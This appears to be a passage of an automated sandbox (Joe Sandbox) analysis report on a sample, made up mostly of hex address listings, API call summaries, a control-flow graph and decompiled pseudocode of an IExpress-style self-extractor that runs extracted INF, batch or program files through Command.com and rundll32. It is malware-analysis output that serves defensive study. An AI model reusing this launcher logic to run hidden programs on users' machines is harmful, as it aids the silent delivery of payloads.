                                                                                                                                                                                                                                            0x00323fda
                                                                                                                                                                                                                                            0x00323fe1
                                                                                                                                                                                                                                            0x00323fe3
                                                                                                                                                                                                                                            0x00323fe3
                                                                                                                                                                                                                                            0x00323fe8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323fe8
                                                                                                                                                                                                                                            0x00323f33
                                                                                                                                                                                                                                            0x00323f37
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323f37
                                                                                                                                                                                                                                            0x00323dee
                                                                                                                                                                                                                                            0x00323dee
                                                                                                                                                                                                                                            0x00323df5
                                                                                                                                                                                                                                            0x00323fad
                                                                                                                                                                                                                                            0x00323fb9
                                                                                                                                                                                                                                            0x00323fc2
                                                                                                                                                                                                                                            0x00323fc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323fc8
                                                                                                                                                                                                                                            0x00323dfb
                                                                                                                                                                                                                                            0x00323dfd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323e03
                                                                                                                                                                                                                                            0x00323e0a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323e15
                                                                                                                                                                                                                                            0x00323e17
                                                                                                                                                                                                                                            0x00323e19
                                                                                                                                                                                                                                            0x00323f94
                                                                                                                                                                                                                                            0x00323fa4
                                                                                                                                                                                                                                            0x00323f7c
                                                                                                                                                                                                                                            0x00323f80
                                                                                                                                                                                                                                            0x00323f8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323f8b
                                                                                                                                                                                                                                            0x00323e2c
                                                                                                                                                                                                                                            0x00323e30
                                                                                                                                                                                                                                            0x00323e34
                                                                                                                                                                                                                                            0x00323e36
                                                                                                                                                                                                                                            0x00323f69
                                                                                                                                                                                                                                            0x00323f6e
                                                                                                                                                                                                                                            0x00323f70
                                                                                                                                                                                                                                            0x00323f76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323f76
                                                                                                                                                                                                                                            0x00323e3c
                                                                                                                                                                                                                                            0x00323e43
                                                                                                                                                                                                                                            0x00323e47
                                                                                                                                                                                                                                            0x00323e52
                                                                                                                                                                                                                                            0x00323e56
                                                                                                                                                                                                                                            0x00323e5c
                                                                                                                                                                                                                                            0x00323e61
                                                                                                                                                                                                                                            0x00323e68
                                                                                                                                                                                                                                            0x00323e70
                                                                                                                                                                                                                                            0x00323e74
                                                                                                                                                                                                                                            0x00323e7c
                                                                                                                                                                                                                                            0x00323e80
                                                                                                                                                                                                                                            0x00323e82
                                                                                                                                                                                                                                            0x00323e82
                                                                                                                                                                                                                                            0x00323e87
                                                                                                                                                                                                                                            0x00323e87
                                                                                                                                                                                                                                            0x00323e8b
                                                                                                                                                                                                                                            0x00323e91
                                                                                                                                                                                                                                            0x00323e94
                                                                                                                                                                                                                                            0x00323e96
                                                                                                                                                                                                                                            0x00323e96
                                                                                                                                                                                                                                            0x00323e9b
                                                                                                                                                                                                                                            0x00323e9b
                                                                                                                                                                                                                                            0x00323e9f
                                                                                                                                                                                                                                            0x00323ea2
                                                                                                                                                                                                                                            0x00323ea4
                                                                                                                                                                                                                                            0x00323ea4
                                                                                                                                                                                                                                            0x00323ea9
                                                                                                                                                                                                                                            0x00323ea9
                                                                                                                                                                                                                                            0x00323ead
                                                                                                                                                                                                                                            0x00323eb3
                                                                                                                                                                                                                                            0x00323eb6
                                                                                                                                                                                                                                            0x00323eb8
                                                                                                                                                                                                                                            0x00323eb8
                                                                                                                                                                                                                                            0x00323ebd
                                                                                                                                                                                                                                            0x00323ebd
                                                                                                                                                                                                                                            0x00323ec1
                                                                                                                                                                                                                                            0x00323ec3
                                                                                                                                                                                                                                            0x00323ec5
                                                                                                                                                                                                                                            0x00323ec5
                                                                                                                                                                                                                                            0x00323eca
                                                                                                                                                                                                                                            0x00323eca
                                                                                                                                                                                                                                            0x00323ece
                                                                                                                                                                                                                                            0x00323ed5
                                                                                                                                                                                                                                            0x00323ed9
                                                                                                                                                                                                                                            0x00323ee0
                                                                                                                                                                                                                                            0x00323ee6
                                                                                                                                                                                                                                            0x00323eea
                                                                                                                                                                                                                                            0x00323eec
                                                                                                                                                                                                                                            0x00323eee
                                                                                                                                                                                                                                            0x00323ef3
                                                                                                                                                                                                                                            0x00323ef3
                                                                                                                                                                                                                                            0x00323ef5
                                                                                                                                                                                                                                            0x00323efa
                                                                                                                                                                                                                                            0x00323efb
                                                                                                                                                                                                                                            0x00323efd
                                                                                                                                                                                                                                            0x00323f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323eff
                                                                                                                                                                                                                                            0x00323eff
                                                                                                                                                                                                                                            0x00323f05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323f05
                                                                                                                                                                                                                                            0x00323efd
                                                                                                                                                                                                                                            0x00323dc7
                                                                                                                                                                                                                                            0x00323dce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323dd0
                                                                                                                                                                                                                                            0x00323dd7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323dd9
                                                                                                                                                                                                                                            0x00323ddb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323ddd
                                                                                                                                                                                                                                            0x00323de1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323de1
                                                                                                                                                                                                                                            0x00323d59
                                                                                                                                                                                                                                            0x00323d65
                                                                                                                                                                                                                                            0x00323d6a
                                                                                                                                                                                                                                            0x00323d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323d6e
                                                                                                                                                                                                                                            0x00323d75
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323d8f
                                                                                                                                                                                                                                            0x00323d96
                                                                                                                                                                                                                                            0x00323d98
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323d98
                                                                                                                                                                                                                                            0x00323c8f
                                                                                                                                                                                                                                            0x00323c98
                                                                                                                                                                                                                                            0x00323cf1
                                                                                                                                                                                                                                            0x00323cf3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323cfe
                                                                                                                                                                                                                                            0x00323d11
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323d11
                                                                                                                                                                                                                                            0x00323c9c
                                                                                                                                                                                                                                            0x00323ca5
                                                                                                                                                                                                                                            0x00323ca7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323cad
                                                                                                                                                                                                                                            0x00323cb2
                                                                                                                                                                                                                                            0x00323cb7
                                                                                                                                                                                                                                            0x00323cc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323ce8
                                                                                                                                                                                                                                            0x00323cec
                                                                                                                                                                                                                                            0x00323ced
                                                                                                                                                                                                                                            0x00323ced
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323ce8
                                                                                                                                                                                                                                            0x00323c9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323c9e
                                                                                                                                                                                                                                            0x00323c56
                                                                                                                                                                                                                                            0x00323d35
                                                                                                                                                                                                                                            0x00323d35
                                                                                                                                                                                                                                            0x00323d3c
                                                                                                                                                                                                                                            0x00323d48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323d48
                                                                                                                                                                                                                                            0x00323c03
                                                                                                                                                                                                                                            0x00323be2
                                                                                                                                                                                                                                            0x00323be7
                                                                                                                                                                                                                                            0x00323bee
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00323C11
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00323CDC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00328C42), ref: 00323D8F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00323E26
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00328C42), ref: 00323EFF
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00328C42), ref: 00323F1F
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00328C42), ref: 00323F40
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00328C42), ref: 00323F47
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00328C42), ref: 00323F76
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00328C42), ref: 00323F80
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00328C42), ref: 00323FC2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                                                            • API String ID: 1032054927-1634589459
                                                                                                                                                                                                                                            • Opcode ID: a62da986a5eeb560798d94add9b0a2df2323b2cfccd2cd921a29c9022ae3a8c2
                                                                                                                                                                                                                                            • Instruction ID: a8e872a3f359b0cc478637afdecea5562e9ba8a34707d9cc6113969f11d9b7e2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a62da986a5eeb560798d94add9b0a2df2323b2cfccd2cd921a29c9022ae3a8c2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BB1D270908331AFD733DF24B945B6B76E8EB84700F11492EFA85D6191DB78CA45CB92
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 141 321ae8-321b2c call 321680 144 321b3b-321b40 141->144 145 321b2e-321b39 141->145 146 321b46-321b61 call 321a84 144->146 145->146 149 321b63-321b65 146->149 150 321b9f-321bc2 call 321781 call 32658a 146->150 152 321b68-321b6d 149->152 157 321bc7-321bd3 call 3266c8 150->157 152->152 154 321b6f-321b74 152->154 154->150 156 321b76-321b7b 154->156 158 321b83-321b86 156->158 159 321b7d-321b81 156->159 166 321d73-321d7f call 3266c8 157->166 167 321bd9-321bf1 CompareStringA 157->167 158->150 162 321b88-321b8a 158->162 159->158 161 321b8c-321b9d call 321680 159->161 161->157 162->150 162->161 175 321d81-321d99 CompareStringA 166->175 176 321df8-321e09 LocalAlloc 166->176 167->166 168 321bf7-321c07 GetFileAttributesA 167->168 170 321d53-321d5e 168->170 171 321c0d-321c15 168->171 173 321d64-321d6e call 3244b9 170->173 171->170 174 321c1b-321c33 call 321a84 171->174 191 321e94-321ea4 call 326ce0 173->191 187 321c50-321c61 LocalAlloc 174->187 188 321c35-321c38 174->188 175->176 181 321d9b-321da2 175->181 178 321dd4-321ddf 176->178 179 321e0b-321e1b GetFileAttributesA 176->179 178->173 184 321e67-321e73 call 321680 179->184 185 321e1d-321e1f 179->185 182 321da5-321daa 181->182 182->182 189 321dac-321db4 182->189 197 321e78-321e84 call 322aac 184->197 185->184 192 321e21-321e3e call 321781 185->192 187->178 196 321c67-321c72 187->196 193 321c40-321c4b call 321a84 188->193 194 321c3a 188->194 195 321db7-321dbc 189->195 192->197 211 321e40-321e43 192->211 193->187 194->193 195->195 201 321dbe-321dd2 LocalAlloc 195->201 202 321c74 196->202 203 321c79-321cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->203 210 321e89-321e92 197->210 201->178 207 321de1-321df3 call 32171e 201->207 202->203 208 321cc2-321ccc 203->208 209 321cf8-321d07 203->209 207->210 215 321cd3-321cf3 call 321680 * 2 208->215 216 321cce 208->216 212 321d23 209->212 213 321d09-321d21 GetShortPathNameA 209->213 210->191 211->197 217 321e45-321e65 call 3216b3 * 2 211->217 219 321d28-321d2b 212->219 213->219 215->210 216->215 217->197 223 321d32-321d4e call 32171e 219->223 224 321d2d 219->224 223->210 224->223
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00321AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v527;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				char _v1552;
                                                                                                                                                                                                                                            				CHAR* _v1556;
                                                                                                                                                                                                                                            				int* _v1560;
                                                                                                                                                                                                                                            				CHAR** _v1564;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                            				CHAR* _t53;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				CHAR* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				signed char _t65;
                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                                                                                            				CHAR* _t90;
                                                                                                                                                                                                                                            				CHAR* _t92;
                                                                                                                                                                                                                                            				char _t105;
                                                                                                                                                                                                                                            				char _t106;
                                                                                                                                                                                                                                            				CHAR** _t111;
                                                                                                                                                                                                                                            				CHAR* _t115;
                                                                                                                                                                                                                                            				intOrPtr* _t125;
                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                            				CHAR* _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				intOrPtr* _t146;
                                                                                                                                                                                                                                            				char* _t148;
                                                                                                                                                                                                                                            				CHAR* _t151;
                                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                                            				CHAR* _t155;
                                                                                                                                                                                                                                            				CHAR* _t156;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t48 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                            				_t108 = __ecx;
                                                                                                                                                                                                                                            				_v1564 = _a4;
                                                                                                                                                                                                                                            				_v1560 = _a8;
                                                                                                                                                                                                                                            				E00321680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                            				if(_v528 != 0x22) {
                                                                                                                                                                                                                                            					_t135 = " ";
                                                                                                                                                                                                                                            					_t53 =  &_v528;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t135 = "\"";
                                                                                                                                                                                                                                            					_t53 =  &_v527;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t111 =  &_v1556;
                                                                                                                                                                                                                                            				_v1556 = _t53;
                                                                                                                                                                                                                                            				_t54 = E00321A84(_t111, _t135);
                                                                                                                                                                                                                                            				_t156 = _v1556;
                                                                                                                                                                                                                                            				_t151 = _t54;
                                                                                                                                                                                                                                            				if(_t156 == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_push(_t111);
                                                                                                                                                                                                                                            					E00321781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            					E0032658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t132 = _t156;
                                                                                                                                                                                                                                            					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t105 =  *_t132;
                                                                                                                                                                                                                                            						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                            					} while (_t105 != 0);
                                                                                                                                                                                                                                            					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                            					if(_t111 < 3) {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t106 = _t156[1];
                                                                                                                                                                                                                                            					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                            						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						E00321680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t138 = 0x2e;
                                                                                                                                                                                                                                            						_t57 = E003266C8(_t156, _t138);
                                                                                                                                                                                                                                            						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            							_t139 = 0x2e;
                                                                                                                                                                                                                                            							_t115 = _t156;
                                                                                                                                                                                                                                            							_t58 = E003266C8(_t115, _t139);
                                                                                                                                                                                                                                            							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									goto L43;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                            								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            									E00321680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_push(_t115);
                                                                                                                                                                                                                                            									_t108 = 0x400;
                                                                                                                                                                                                                                            									E00321781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                            									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                            										E003216B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                            										E003216B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = _t156;
                                                                                                                                                                                                                                            								 *_t156 = 0;
                                                                                                                                                                                                                                            								E00322AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                            								goto L53;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t145 = _t125 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t76 =  *_t125;
                                                                                                                                                                                                                                            									_t125 = _t125 + 1;
                                                                                                                                                                                                                                            								} while (_t76 != 0);
                                                                                                                                                                                                                                            								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                            								_t146 =  &_v268;
                                                                                                                                                                                                                                            								_t157 = _t146 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t77 =  *_t146;
                                                                                                                                                                                                                                            									_t146 = _t146 + 1;
                                                                                                                                                                                                                                            								} while (_t77 != 0);
                                                                                                                                                                                                                                            								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                            								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                            								if(_t156 != 0) {
                                                                                                                                                                                                                                            									E0032171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                            									goto L53;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L43;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t140 = 0x525;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t60 =  &_v268;
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t140 = "[";
                                                                                                                                                                                                                                            								_v1556 = _t151;
                                                                                                                                                                                                                                            								_t90 = E00321A84( &_v1556, "[");
                                                                                                                                                                                                                                            								if(_t90 != 0) {
                                                                                                                                                                                                                                            									if( *_t90 != 0) {
                                                                                                                                                                                                                                            										_v1556 = _t90;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "]";
                                                                                                                                                                                                                                            									E00321A84( &_v1556, "]");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									L43:
                                                                                                                                                                                                                                            									_t60 = 0;
                                                                                                                                                                                                                                            									_t140 = 0x4b5;
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									_push(0x10);
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									L35:
                                                                                                                                                                                                                                            									_push(_t60);
                                                                                                                                                                                                                                            									E003244B9(0, _t140);
                                                                                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                                                                                            									goto L54;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t155 = _v1556;
                                                                                                                                                                                                                                            									_t92 = _t155;
                                                                                                                                                                                                                                            									if( *_t155 == 0) {
                                                                                                                                                                                                                                            										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									 *0x329120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                            									 *_v1560 = 1;
                                                                                                                                                                                                                                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x321140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                            										 *0x329a34 =  *0x329a34 & 0xfffffffb;
                                                                                                                                                                                                                                            										if( *0x329a40 != 0) {
                                                                                                                                                                                                                                            											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t108 = "setupx.dll";
                                                                                                                                                                                                                                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_push( &_v268);
                                                                                                                                                                                                                                            										_push(_t155);
                                                                                                                                                                                                                                            										E0032171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										 *0x329a34 =  *0x329a34 | 0x00000004;
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										E00321680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                            										_t140 = 0x200;
                                                                                                                                                                                                                                            										E00321680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L53:
                                                                                                                                                                                                                                            									_t62 = 1;
                                                                                                                                                                                                                                            									 *_v1564 = _t156;
                                                                                                                                                                                                                                            									L54:
                                                                                                                                                                                                                                            									_pop(_t152);
                                                                                                                                                                                                                                            									return E00326CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}














































                                                                                                                                                                                                                                            0x00321af3
                                                                                                                                                                                                                                            0x00321afa
                                                                                                                                                                                                                                            0x00321b07
                                                                                                                                                                                                                                            0x00321b09
                                                                                                                                                                                                                                            0x00321b1a
                                                                                                                                                                                                                                            0x00321b20
                                                                                                                                                                                                                                            0x00321b2c
                                                                                                                                                                                                                                            0x00321b3b
                                                                                                                                                                                                                                            0x00321b40
                                                                                                                                                                                                                                            0x00321b2e
                                                                                                                                                                                                                                            0x00321b2e
                                                                                                                                                                                                                                            0x00321b33
                                                                                                                                                                                                                                            0x00321b33
                                                                                                                                                                                                                                            0x00321b46
                                                                                                                                                                                                                                            0x00321b4c
                                                                                                                                                                                                                                            0x00321b52
                                                                                                                                                                                                                                            0x00321b57
                                                                                                                                                                                                                                            0x00321b5d
                                                                                                                                                                                                                                            0x00321b61
                                                                                                                                                                                                                                            0x00321b9f
                                                                                                                                                                                                                                            0x00321b9f
                                                                                                                                                                                                                                            0x00321bb1
                                                                                                                                                                                                                                            0x00321bc2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321b63
                                                                                                                                                                                                                                            0x00321b63
                                                                                                                                                                                                                                            0x00321b65
                                                                                                                                                                                                                                            0x00321b68
                                                                                                                                                                                                                                            0x00321b68
                                                                                                                                                                                                                                            0x00321b6a
                                                                                                                                                                                                                                            0x00321b6b
                                                                                                                                                                                                                                            0x00321b6f
                                                                                                                                                                                                                                            0x00321b74
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321b76
                                                                                                                                                                                                                                            0x00321b7b
                                                                                                                                                                                                                                            0x00321b86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321b8c
                                                                                                                                                                                                                                            0x00321b8c
                                                                                                                                                                                                                                            0x00321b98
                                                                                                                                                                                                                                            0x00321bc7
                                                                                                                                                                                                                                            0x00321bc9
                                                                                                                                                                                                                                            0x00321bcc
                                                                                                                                                                                                                                            0x00321bd3
                                                                                                                                                                                                                                            0x00321d75
